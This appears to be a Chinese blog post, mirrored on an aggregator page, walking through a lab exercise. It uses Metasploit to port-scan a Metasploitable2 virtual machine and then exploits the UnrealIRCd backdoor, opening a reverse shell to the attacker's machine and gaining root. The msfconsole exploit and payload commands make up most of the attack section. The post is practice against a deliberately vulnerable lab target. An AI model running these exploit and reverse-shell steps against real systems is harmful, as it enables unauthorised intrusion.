当前位置: 首页 > news >正文

第10章 metasploit(网络安全防御实战--蓝军武器库)

网络安全防御实战--蓝军武器库是2020年出版的,已经过去3年时间了,最近利用闲暇时间,抓紧吸收,总的来说,第10章开始学习利用metasploit渗透测试工具去打metasploit2虚拟机,本文我演示了metasploit端口扫描和漏洞利用,更多有趣的渗透测试实验,有待大家挖掘~

  • ailx10:metasploit渗透测试入门
  • ailx10:使用metasploit获取域散列值
  • ailx10:Meterpreter渗透测试入门

ailx10

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

1、启动metasploitable2虚拟机,拿到IP地址(192.168.85.171)

2、访问web页面,里面有很多白帽子黑客练习的靶场

3、使用root 身份 运行 kali 的 msfconsole ,对metasploitable2进行syn端口扫描

search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.85.171

4、查看syn端口扫描结果,体验很慢,不如 nmap

5、漏洞利用,直接帮忙提权到root了,成功获得metasploitable2 后门

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 192.168.85.171
set payload generic/shell_reverse_tcp
set payload cmd/unix/reverse
set lhost 192.168.85.23
run

编辑于 2023-03-24 21:47・IP 属地江苏

相关文章:

  • 每日一题----------异常处理
  • 【Python运维】实现高效的自动化备份与恢复:Python脚本从入门到实践
  • 数据结构---八大排序
  • Python的学习篇(七)--网页结构
  • 数据清洗与治理:为大模型预训练打造完美数据
  • Python已知后序遍历和中序遍历,求先序遍历
  • 字典树(trie树)详解
  • TCP/IP 5层协议簇:网络层(ICMP协议)
  • 如何学习编程?
  • Windows Server开启审计功能
  • Release of anyui for LVGL v0.27.0
  • grum-与gam-词源故事
  • 【数据分享】1999—2023年我国地级市污染物排放和环境治理数据
  • 【MySQL】数据库基础
  • 【计算机网络】TCP
  • Android 蓝牙OTA固件升级
  • Yashan SQL语句
  • OSCP最新备考攻略:迎接2024改版后的OSCP+认证
  • STM32-I2C通信协议
  • 苦瓜书盘官网,免费pdf/mobi电子书下载网站
  • 南京做网站多少钱/怎么开发自己的网站
  • 济南做网站建设/西安百度关键词排名服务
  • 营销策划岗位职责/关于进一步优化当前疫情防控措施
  • 奢做品二手 哪个网站好/短视频seo关键词
  • 公司建设网站需要去哪报备/企业网站有哪些平台
  • 南京seo报价/seo搜索推广